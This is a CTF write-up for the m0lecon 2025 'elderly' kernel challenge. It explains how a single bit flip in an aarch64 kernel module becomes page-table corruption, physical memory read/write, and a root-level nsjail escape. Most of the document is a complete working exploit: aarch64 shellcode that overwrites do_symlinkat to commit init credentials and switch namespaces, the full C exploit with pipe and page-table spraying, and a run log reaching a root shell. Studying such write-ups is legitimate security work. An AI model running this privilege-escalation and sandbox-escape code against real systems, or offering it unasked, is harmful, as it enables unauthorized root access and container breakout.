elderly - m0lecon CTF 2025 (Writeup)
I finnaly managed to solve a chall I didn’t manage to solve during the m0lecon CTF. It was an amazing journey of messing with page table entries, aarch64 shellcoding and escaping nsjail, only with one bit flip.
Challenge overview
It’s a simple aarch64 Linux kernel module with the following interesting ioctl:
static long pwn_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
struct params p;
int ret = -EINVAL;
void *ptr = NULL;
if (copy_from_user(&p, (void *)arg, sizeof(p)))
return ret;
if (!p.size || (p.size > 192))
return ret;
mutex_lock(&g_mutex);
if (!done) {
ptr = kmalloc(p.size, p.account ? GFP_KERNEL_ACCOUNT : GFP_KERNEL);
if (!ptr)
goto err;
u64 page = (u64)ptr & ~0xfffUL;
u64 pval = (u64)ptr + (p.idx / 8);
if ((pval & ~0xfffUL) != page)
goto err;
change_bit(p.idx, ptr);
done = 1;
}
ptr = NULL;
ret = 0;
err:
if (ptr)
kfree(ptr);
mutex_unlock(&g_mutex);
return ret;
}
In short, we can ask the module for a heap allocation of size below or equal to
192, and we also control the allocation flags. Then, we can flip a bit in the
same page where our chunk was allocated (change_bit()
is not bound-checked).
All of that only once, and in the same shot. Pretty low primitive. Also, our
welcome shell runs inside nsjail.
Solution
My solution consists in getting arbitrary physical memory read/write by messing
with the page tables. With this we can bruteforce the kernel text base address,
and write a shellcode in a syscall handler that when executed will escape our
task from the sandbox and also getting root. The idea to get arb physical memory
read/write is to flip a victim pipe_buffer->page
bit to make it point to
another valid page, that we’ll free afterwrads to get a sort of struct page
uaf. Then, we spray page tables to get out victim pipe_buffer->page
being
reallocated to a level 2 page table. With this, we should be able to overwrite
page table entries by writing to our victim pipe and to get arb physical memory
read/write by writing a fake page table entry pointing to the physical address
we want.
Please find the full exploit here.
Here is more detailed walkthrough:
- Gaining physical memory arbitrary read and write
- Spray some
pipe_buffer
in kmalloc-cg-192 cache. We can do that by simply allocating pipes (so by
calling
pipe()
). However, the default pipe (internally pipe_inode_info allocates 0x10 pipe buffers (code), leading topipe->bufs
allocated in kmalloc-cg-1024 (0x10 * sizeof(struct pipe_buffer) = 640). To make the pipe buffers in kmalloc_cg-192, we can use theF_SETPIPE_SZ
fcntl
to change the number of internal buffers, reducing the size ofpipe->bufs
(code). - Free 1 pipe buffer out of two, to make room for our future chunk allocated in the module.
- Allocate a chunk in kmalloc-cg-192 with the module ioctl, and flip the 6th
bit of the next chunk. Here, we hope that our chunk is adjacent to a
pipe_buffer
, and we want to flip a bit in this adjacentpipe_buffer
page
field. Sincepage
s are allocated in a contiguous memory region, we know that &victim_page + sizeof(struct page) points to another valid page. Furthermore,sizeof(struct page) = 1 << 6
. The goal of this is that the flippedpage
address points to one of the sprayed pipe’spipe_buffer->page
. With this, we’ll have somehwere a victim pipe pointing to another pipe’s buffer. - Look for the victim pipe: we can simply read to all sprayed pipes, and
check if the value we read is the same we initialized the pipe with. If it
doesn’t match, it means that this pipe’s buffer point to another buffer.
We successfuly flipped a
pipe_buffer->page
to another valid page. - Free all pipes except our victim pipe. With this, our victim’s pipe buffer is now backed by a freed page.
- Spray page tables by writing to
mmap()
regions in userspace (mapped at the beginning of the exploit). This will trigger a #PF, handled by the kernel by allocating new page tables. If the spray worked, we have our pipe buffer pointing to a level 2 page table (page tables are page-sized), containing page table entries. We can confirm that by writing a fake page table entry in our victim pipe, pointing to the physical address0x40000000
. Now we can read to all mmap’ed regions and if for one, the read value is not the one we wrote when initilizaing the region, we know that we messed with the page table, and the address translation points to0x40000000
physical address. - Now that we have a our victim pipe and our victim page (the mapped region
pointing to somewhere else), we can get arb read/write by writing a fake
page table entry in the victim pipe buffer to the physical address we
want, and reading/writing to it by the simply reading/writing to the
victim page region (ie. simply
memcpy
to the address of the victim page, returned bymmap
).
- Spray some
pipe_buffer
in kmalloc-cg-192 cache. We can do that by simply allocating pipes (so by
calling
-
Finding the kernel base physical address by bruteforcing read to all pages start and check if the read value matches the 8 first bytes of the kernel .text.
- Write our shellcode at
do_symlinkat()
address, which is called when creating a symlink. It’s accessible within the sandbox. I stole this technique here. I also stole the shellcode we’re writing and adapted it to aarch64. It does the following:
commit_creds(init_cred);
task = find_task_by_vpid(1);
switch_task_namespaces(task, init_nsproxy);
new_fs = copy_fs_struct(init_fs);
current_task = find_task_by_vpid(getpid());
current_task->fs = new_fs;
With this, we’re able to get root, get unrestricted namespaces and use the unsandboxed init_fs, giving full nsjail esapce.
We can now execute the shellcode by creating a symlink and profit.
===============================================================
=============== The gets() of kernel pwn challs ===============
===============================================================
sh: can't access tty; job control turned off
~ $ /jail/exploit
[+] Victim pipe found: 19
[+] Found victim sprayed page: 0xdfa00000
[+] Looking for kernel physical base address...
[+] Kernel physical base: 0xb5010000
[+] pid: 2
[+] Writing shellcode
[+] Triggering
sh: can't access tty; job control turned off
/ # id
uid=0(root) gid=0(root)
/ # cat /dev/vda
t ����S�-�
8�q��ۻ�B%Y1/tmp/flag_ڋ�ZP�,
-� t`
-�-�-�������� tktk��-�0-�-�-� -�A�������� �(2�(2�(2-�(������� tktk�.��tk
.
..
flag.txt
.�..ptm{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}
Limitations
Unfortunately the exploit is not reliable. The pipe spray is not very effective, for whatever reason. It struggles allocating a pipe_buffer next to our chunk allocated by the module. If this succeeds, the rest is reliable, but this step is not. :(
Full exploit
.section .data
.set x30_kbase_offset, 0x34dd20
.set init_cred, 0x20222b8
.set commit_creds, 0xce5f8
.set find_task_by_vpid, 0xc5250
.set init_nsproxy, 0x2022088
.set switch_task_namespaces, 0xcbb6c
.set init_fs, 0x20a7938
.set copy_fs_struct, 0x384f54
.section .text
.global _start
_start:
/* backup ret address on the stack */
sub sp, sp, #0x8
str x30, [sp]
/* put kernel base in x27 based on the value in x30 */
mov x27, x30
movz x26, x30_kbase_offset & 0xffff
movk x26, x30_kbase_offset >> 16, lsl 16
subs x27, x27, x26
/* commit_creds(init_cred) */
mov x0, x27
movz x26, init_cred & 0xffff
movk x26, (init_cred) >> 16, lsl 16
add x0, x0, x26
mov x9, x27
movz x26, commit_creds & 0xffff
movk x26, (commit_creds) >> 16, lsl 16
add x9, x9, x26
blr x9
/* task = find_task_by_vpid(1) */
movz x0, 1
mov x9, x27
movz x26, find_task_by_vpid & 0xffff
movk x26, (find_task_by_vpid) >> 16, lsl 16
add x9, x9, x26
blr x9
/* switch_task_namespaces(task, init_nsproxy) */
mov x1, x27
movz x26, init_nsproxy & 0xffff
movk x26, (init_nsproxy) >> 16, lsl 16
add x1, x1, x26
mov x9, x27
movz x26, switch_task_namespaces & 0xffff
movk x26, (switch_task_namespaces) >> 16, lsl 16
add x9, x9, x26
blr x9
/* new_fs = copy_fs_struct(init_fs) */
mov x0, x27
movz x26, init_fs & 0xffff
movk x26, (init_fs) >> 16, lsl 16
add x0, x0, x26
mov x9, x27
movz x26, copy_fs_struct & 0xffff
movk x26, (copy_fs_struct) >> 16, lsl 16
add x9, x9, x26
blr x9
/* backup new_fs */
mov x25, x0
/* current = find_task_by_vpid(getpid()) */
mov x0, 0x4141 /* patched at runtime */
mov x9, x27
movz x26, find_task_by_vpid & 0xffff
movk x26, (find_task_by_vpid) >> 16, lsl 16
add x9, x9, x26
blr x9
/* current->fs = new_fs */
str x25, [x0, #0x6d8]
ldr x30, [sp]
add sp, sp, #0x8
ret
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <sched.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#define SPRAY 20
#define PAGE_SPRAY 0x200
#define PAGE_SIZE 0x1000uLL
struct params {
uint32_t size;
uint32_t idx;
bool account;
};
static int fds[SPRAY][2];
static void *page_spray[PAGE_SPRAY];
static int64_t pipe_victim_idx = -1;
static void *victim_page = 0uLL;
char shellcode[] = {
0xff, 0x23, 0x0, 0xd1, 0xfe, 0x3, 0x0, 0xf9, 0xfb, 0x3, 0x1e, 0xaa,
0x1a, 0xa4, 0x9b, 0xd2, 0x9a, 0x6, 0xa0, 0xf2, 0x7b, 0x3, 0x1a, 0xeb,
0xe0, 0x3, 0x1b, 0xaa, 0x1a, 0x57, 0x84, 0xd2, 0x5a, 0x40, 0xa0, 0xf2,
0x0, 0x0, 0x1a, 0x8b, 0xe9, 0x3, 0x1b, 0xaa, 0x1a, 0xbf, 0x9c, 0xd2,
0x9a, 0x1, 0xa0, 0xf2, 0x29, 0x1, 0x1a, 0x8b, 0x20, 0x1, 0x3f, 0xd6,
0x20, 0x0, 0x80, 0xd2, 0xe9, 0x3, 0x1b, 0xaa, 0x1a, 0x4a, 0x8a, 0xd2,
0x9a, 0x1, 0xa0, 0xf2, 0x29, 0x1, 0x1a, 0x8b, 0x20, 0x1, 0x3f, 0xd6,
0xe1, 0x3, 0x1b, 0xaa, 0x1a, 0x11, 0x84, 0xd2, 0x5a, 0x40, 0xa0, 0xf2,
0x21, 0x0, 0x1a, 0x8b, 0xe9, 0x3, 0x1b, 0xaa, 0x9a, 0x6d, 0x97, 0xd2,
0x9a, 0x1, 0xa0, 0xf2, 0x29, 0x1, 0x1a, 0x8b, 0x20, 0x1, 0x3f, 0xd6,
0xe0, 0x3, 0x1b, 0xaa, 0x1a, 0x27, 0x8f, 0xd2, 0x5a, 0x41, 0xa0, 0xf2,
0x0, 0x0, 0x1a, 0x8b, 0xe9, 0x3, 0x1b, 0xaa, 0x9a, 0xea, 0x89, 0xd2,
0x1a, 0x7, 0xa0, 0xf2, 0x29, 0x1, 0x1a, 0x8b, 0x20, 0x1, 0x3f, 0xd6,
0xf9, 0x3, 0x0, 0xaa, 0x20, 0x28, 0x88, 0xd2, 0xe9, 0x3, 0x1b, 0xaa,
0x1a, 0x4a, 0x8a, 0xd2, 0x9a, 0x1, 0xa0, 0xf2, 0x29, 0x1, 0x1a, 0x8b,
0x20, 0x1, 0x3f, 0xd6, 0x19, 0x6c, 0x3, 0xf9, 0xfe, 0x3, 0x40, 0xf9,
0xff, 0x23, 0x0, 0x91, 0xc0, 0x3, 0x5f, 0xd6,
};
// taken from
// https://github.com/google/google-ctf/blob/master/2023/pwn-kconcat/solution/exp.c
void hexdump(char *buf, int size) {
for (int i = 0; i < size; i++) {
if (i % 16 == 0)
printf("%04x: ", i);
printf("%02x ", buf[i]);
if (i % 16 == 15)
printf("\n");
}
if (size % 16 != 0)
printf("\n");
}
void win(void) { system("sh"); }
void encode_mov(uint16_t value, char *output) {
int32_t opcode = (0xd28 << 20) + (value << 5);
for (int i = 0; i < 4; i++) {
output[i] = (opcode & (0xff << (i * 8))) >> (i * 8);
}
}
void patch_shellcode(uint16_t to_patch_val, uint16_t val) {
void *p;
char value[4];
char to_patch[4];
encode_mov(val, value);
encode_mov(to_patch_val, to_patch);
p = memmem(shellcode, sizeof(shellcode), to_patch, 4);
if (!p) {
perror("memem()");
exit(EXIT_FAILURE);
}
memcpy(p, value, 4);
}
void spray_pipe() {
int ret;
char tmp[PAGE_SIZE];
for (uint8_t i = 0; i < SPRAY; i++) {
if (pipe(fds[i]) < 0) {
perror("pipe()");
exit(EXIT_FAILURE);
}
ret = fcntl(fds[i][0], F_SETPIPE_SZ, PAGE_SIZE * 4);
if (ret < 0) {
perror("fcntl()");
exit(EXIT_FAILURE);
}
memset(&tmp, 0x41 + i, sizeof(tmp));
if (write(fds[i][1], &tmp, sizeof(tmp)) < 0) {
perror("write()");
exit(EXIT_FAILURE);
}
}
}
static int *alloc_pipe_buf(int *fds) {
int ret;
char tmp[PAGE_SIZE];
if (pipe(fds) < 0) {
perror("pipe()");
exit(EXIT_FAILURE);
}
ret = fcntl(fds[0], F_SETPIPE_SZ, PAGE_SIZE * 4);
if (ret < 0) {
perror("fcntl()");
exit(EXIT_FAILURE);
}
// write a full page
memset(&tmp, 0x41, sizeof(tmp));
if (write(fds[1], &tmp, sizeof(tmp)) < 0) {
perror("write()");
exit(EXIT_FAILURE);
}
return fds;
}
static void free_pipe_buf(int *fds) {
close(fds[1]);
close(fds[0]);
}
void spray_page_tables() {
for (int i = 0; i < PAGE_SPRAY; i++)
for (int j = 0; j < 8; j++)
*(uint8_t *)(page_spray[i] + j * PAGE_SIZE) = 0x61 + j;
}
// Finds the page whose page table was modified to point to target
// physical memory.
void *find_sprayed_page() {
char page[PAGE_SIZE];
// drain pipe
if (read(fds[pipe_victim_idx][0], page, PAGE_SIZE) < 0) {
perror("read()");
exit(EXIT_FAILURE);
}
// write a dummy pte to 0x0000000040000000, which is always valid
uint64_t new_pte = 0x0000000040000000 | (0xe8ULL << 48);
new_pte |= (0xf43LL);
if (write(fds[pipe_victim_idx][1], &new_pte, sizeof(new_pte)) < 0) {
perror("write()");
exit(EXIT_FAILURE);
}
for (int i = 0; i < PAGE_SPRAY; i++) {
for (int j = 0; j < 8; j++) {
uint8_t *victim = page_spray[i] + j * PAGE_SIZE;
if (*victim != (0x61 + j)) {
// restore pipe_buffer offset
if (read(fds[pipe_victim_idx][0], page, sizeof(new_pte)) < 0) {
perror("read()");
exit(EXIT_FAILURE);
}
return victim;
}
}
}
return NULL;
}
// Returns the virtual address where we wrote.
void *phys_write(uint64_t dst_phys_addr, void *buf, size_t len) {
char tmp[8];
uint64_t dst_aligned_down = dst_phys_addr & ~(PAGE_SIZE - 1);
uint64_t offset = dst_phys_addr & (PAGE_SIZE - 1);
void *vaddr;
uint64_t new_pte = dst_aligned_down | (0xe8ULL << 48);
new_pte |= (0xf43LL);
if (write(fds[pipe_victim_idx][1], &new_pte, sizeof(new_pte)) < 0) {
perror("write()");
exit(EXIT_FAILURE);
}
vaddr = victim_page + offset;
memcpy(vaddr, buf, len);
// reset pipe buffer offset after write
if (read(fds[pipe_victim_idx][0], &tmp, sizeof(tmp)) < 0) {
perror("read()");
exit(EXIT_FAILURE);
}
return vaddr;
}
void phys_read(uint64_t dst_phys_addr, void *buf, size_t len) {
char tmp[8];
uint64_t dst_aligned_down = dst_phys_addr & ~(PAGE_SIZE - 1);
uint64_t offset = dst_phys_addr & (PAGE_SIZE - 1);
void *vaddr;
uint64_t new_pte = dst_aligned_down | (0xe8ULL << 48);
new_pte |= (0xf43LL);
if (write(fds[pipe_victim_idx][1], &new_pte, sizeof(new_pte)) < 0) {
perror("write()");
exit(EXIT_FAILURE);
}
vaddr = victim_page + offset;
memcpy(buf, vaddr, len);
// reset pipe buffer offset after write
if (read(fds[pipe_victim_idx][0], &tmp, sizeof(tmp)) < 0) {
perror("read()");
exit(EXIT_FAILURE);
}
}
static const uint64_t kernel_text_magic = 0xd503245ff3576a22;
static uint64_t kernel_phys_base = 0uLL;
uint64_t find_kernel_phys_base() {
uint64_t start = 0x0000000040000000;
for (int i = 0; i < 0x1000000; i++) {
uint64_t v = 0;
uint64_t paddr = start + (PAGE_SIZE)*i;
phys_read(paddr, &v, sizeof(v));
if (v == kernel_text_magic) {
return paddr;
}
}
return 0;
}
void bind_core(int core) {
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}
int main(void) {
int fd, ret;
char tmp[0x60];
char page[PAGE_SIZE];
bind_core(0);
for (int i = 0; i < PAGE_SPRAY; i++) {
page_spray[i] =
mmap((void *)(0xdead0000UL + i * 0x10000UL), 0x8000,
PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
if (page_spray[i] == MAP_FAILED) {
perror("mmap()");
exit(EXIT_FAILURE);
}
}
fd = open("/dev/pwn", O_RDWR);
if (!fd) {
perror("open()");
exit(EXIT_FAILURE);
}
spray_pipe();
for (int i = 0; i < SPRAY; i += 2) {
free_pipe_buf(fds[i]);
}
// Allocate victim buffer in kmalloc-cg-192
// we flip the first field (struct page* page)
// to another page (sizeo(strutc page) = 0x40) so we can flip the 6th bit
struct params a = {
.size = 160,
.idx = ((192 * 1) * 8 + 6), // adjacent chunk
.account = true,
};
ret = ioctl(fd, 0, &a);
if (ret < 0) {
perror("ioctl()");
exit(EXIT_FAILURE);
}
for (int i = 1; i < SPRAY; i += 2) {
uint8_t c;
uint8_t dummy[7];
ret = read(fds[i][0], &c, sizeof(c));
if (ret < 0) {
perror("read()");
exit(EXIT_FAILURE);
}
// dummy read to align the pipe buffer
if (read(fds[i][0], &dummy, sizeof(dummy)) < 0) {
perror("read()");
exit(EXIT_FAILURE);
}
if (c != (0x41 + i)) {
pipe_victim_idx = i;
printf("[+] Victim pipe found: %d\n", i);
break;
}
}
if (pipe_victim_idx < 0) {
puts("[!] No victim found");
exit(EXIT_FAILURE);
}
for (int i = 1; i < SPRAY; i += 2) {
if (i == pipe_victim_idx)
continue;
free_pipe_buf(fds[i]);
}
spray_page_tables();
victim_page = find_sprayed_page();
if (!victim_page) {
puts("[!] Can't find the page with a modified PTE");
exit(EXIT_FAILURE);
}
printf("[+] Found victim sprayed page: %p\n", victim_page);
puts("[+] Looking for kernel physical base address...");
kernel_phys_base = find_kernel_phys_base();
if (!kernel_phys_base) {
puts("[!] Failed to find kernel physical base");
exit(EXIT_FAILURE);
}
printf("[+] Kernel physical base: 0x%lx\n", kernel_phys_base);
int pid = getpid();
printf("[+] pid: %d\n", pid);
patch_shellcode(0x4141, pid);
puts("[+] Writing shellcode");
uint64_t do_symlink_at_offset = 0x34da30UL;
phys_write(kernel_phys_base + do_symlink_at_offset, (void *)shellcode,
sizeof(shellcode));
puts("[+] Triggering");
int cwd = open("/", O_DIRECTORY);
symlinkat("/jail/exploit", cwd, "/jail");
win();
close(cwd);
sleep(1000000);
close(fd);
return 0;
}